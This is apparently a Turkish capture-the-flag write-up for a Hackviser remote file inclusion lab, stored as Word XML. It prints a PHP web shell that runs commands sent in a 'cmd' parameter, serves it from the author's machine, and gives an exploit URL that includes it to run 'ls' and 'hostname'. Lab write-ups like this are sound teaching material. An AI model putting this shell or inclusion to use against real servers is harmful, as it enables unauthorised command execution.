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102" w:rsidRDefault="000B6102" w:rsidP="000B61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BASIC REMOTE FILE INCLUSION WRİTE-UP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102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Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kısmı altında File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zafiyetinin Basic Remote File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>labının</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> çözümünü anlatacağım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A529A7" w:rsidRDefault="00401272" w:rsidP="00A529A7">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SENARYO: </w:t>
      </w:r>
      <w:r w:rsidR="00A529A7">
        <w:t>Bu laboratuvar, saldırganın uzak bir sunucuda barındırılan rastgele kodları çalıştırmasına olanak tanıyarak uzaktan kod yürütülmesine yol açan bir Uzaktan Dosya Ekleme (RFI) güvenlik açığı içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A529A7" w:rsidRDefault="00A529A7" w:rsidP="00A529A7">
      <w:r>
        <w:t>Web uygulamasında gördüğünüz 404 hata sayfasının içeriği, URL'deki "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" parametresindeki yoldan getirilmektedir. "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" parametresi değiştirilerek uzaktaki bir sistemden bir dosya sayfaya </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dahil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A529A7" w:rsidRDefault="00A529A7" w:rsidP="00A529A7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payload'ı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackerBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> üzerinde veya VPN kullanarak kendi bilgisayarınız üzerinde servis etmelisiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A529A7" w:rsidRDefault="00A529A7" w:rsidP="00A529A7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A4B1CD"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Gl"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A4B1CD"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web sitesinin çalıştığı sunucunun ana bilgisayar adı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A529A7" w:rsidRDefault="002674BA" w:rsidP="00A529A7">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ÇÖZÜM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010582A" w:rsidRDefault="0010582A" w:rsidP="00A529A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">RFI: Bu açık URL üzerinden yönlendirme yapabilme açığıdır. Örneğin benim ana bilgisayarımda zararlı bir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> dosyası var. URL üzerinden o dosyaya eriştirip sisteme sızmış olabilirim. Şimdi bu anlatılanları uygulamaya dökelim ve daha iyi anlamaya çalışalım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010582A" w:rsidRDefault="009822A0" w:rsidP="00A529A7">
      <w:r>
        <w:t>Siteye gittiğimizde 404.php adında bir sayfa bizi karşılıyor. URL üzerinden isteklerimizi gerçekleştireceğimiz için burayı not alalım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009822A0" w:rsidRDefault="008B3F77" w:rsidP="00A529A7">
      <w:r w:rsidRPr="008B3F77">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B59D0DE" wp14:editId="31587B9F">
            <wp:extent cx="4744112" cy="352474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77" w:rsidRDefault="008B3F77" w:rsidP="00A529A7">
      <w:r>
        <w:t xml:space="preserve">Şimdi bize zararlı bir dosya lazım. Kodlarını bilgisayarda kaydetmek istediğimde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>antivirüs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zararlı kod olarak algıladı. Bu yüzden vereceğim kodu kullanırken dikkatli olalım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</w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_REQUEST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'])){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t xml:space="preserve">        $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ($_REQUEST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>die</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="009C235D"/>
    <w:p w:rsidR="008B3F77" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” şeklinde kodumuz var. Biz bunu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>backdoor.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> olarak kaydedelim. Şimdi ana makinemizden geçici sunucu ayağa kaldıralım. (python3 –m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401272" w:rsidRDefault="00401272" w:rsidP="000B6102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="000B6102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="000B6102">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRPr="009822A0" w:rsidRDefault="009C235D" w:rsidP="009C235D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009C235D">
        <w:t>https://awake-microbe.europe1.hackviser.space/index.php?page=http://10.8.9.164:3333/backdoor.txt?&amp;cmd=</w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t>””</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="009C235D" w:rsidP="000B6102">
      <w:r>
        <w:t>Burada IP adr</w:t>
      </w:r>
      <w:r w:rsidR="00850CCB">
        <w:t xml:space="preserve">esi benim ana makinemin adresi. </w:t>
      </w:r>
      <w:r>
        <w:t>Şimdi bunu çalıştıralım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C235D" w:rsidRDefault="00411593" w:rsidP="000B6102">
      <w:r w:rsidRPr="00411593">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D1BDC2" wp14:editId="2F6AB22A">
            <wp:extent cx="5234940" cy="721882"/>
            <wp:effectExtent l="0" t="0" r="381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5550" cy="72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593" w:rsidRDefault="00411593" w:rsidP="000B6102">
      <w:r>
        <w:t>Başarılı bir şekilde çalıştı. Sorunun cevabını bulabilmemiz için “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” komutunu çalıştıralım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00411593" w:rsidRDefault="002E1801" w:rsidP="000B6102">
      <w:r w:rsidRPr="002E1801">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116AE882" wp14:editId="2B92575E">
            <wp:extent cx="5760720" cy="49974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01" w:rsidRDefault="002E1801" w:rsidP="000B6102">
      <w:r>
        <w:t>CEVABA ULAŞTIK…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</w:p>
    <w:p w:rsidR="002E1801" w:rsidRDefault="002E1801" w:rsidP="000B6102"/>
    <w:p w:rsidR="00862492" w:rsidRDefault="00862492" w:rsidP="000B6102"/>
    <w:p w:rsidR="00862492" w:rsidRDefault="00862492" w:rsidP="000B6102"/>
    <w:p w:rsidR="00862492" w:rsidRDefault="00862492" w:rsidP="000B6102">
      <w:r>
        <w:t xml:space="preserve">EXTRA: </w:t>
      </w:r>
      <w:r w:rsidRPr="00862492">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="652A0E88" wp14:editId="6D0A9919">
            <wp:extent cx="5760720" cy="26949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2" w:rsidRDefault="00862492" w:rsidP="000B6102">
      <w:r>
        <w:t>Şeklinde daha da fazla sömürme işlemleri yapabiliriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00862492" w:rsidRPr="009C235D" w:rsidRDefault="00862492" w:rsidP="000B6102">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102"/>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102"/>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102"/>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102"/>
    <w:p w:rsidR="000B6102" w:rsidRDefault="000B6102" w:rsidP="000B6102"/>
    <w:p w:rsidR="00500FAC" w:rsidRDefault="00500FAC"/>
    <w:sectPr w:rsidR="00500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D2"/>
    <w:rsid w:val="000B6102"/>
    <w:rsid w:val="0010582A"/>
    <w:rsid w:val="002674BA"/>
    <w:rsid w:val="002E1801"/>
    <w:rsid w:val="00401272"/>
    <w:rsid w:val="00411593"/>
    <w:rsid w:val="004240BF"/>
    <w:rsid w:val="00500FAC"/>
    <w:rsid w:val="00850CCB"/>
    <w:rsid w:val="00862492"/>
    <w:rsid w:val="008B3F77"/>
    <w:rsid w:val="009822A0"/>
    <w:rsid w:val="009C235D"/>
    <w:rsid w:val="00A529A7"/>
    <w:rsid w:val="00D9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6527"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A306E1B0-9399-45A1-B819-816B9AC9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02"/>
    <w:pPr>
      <w:spacing w:line="252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012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2024-10-09T13:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-10T15:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>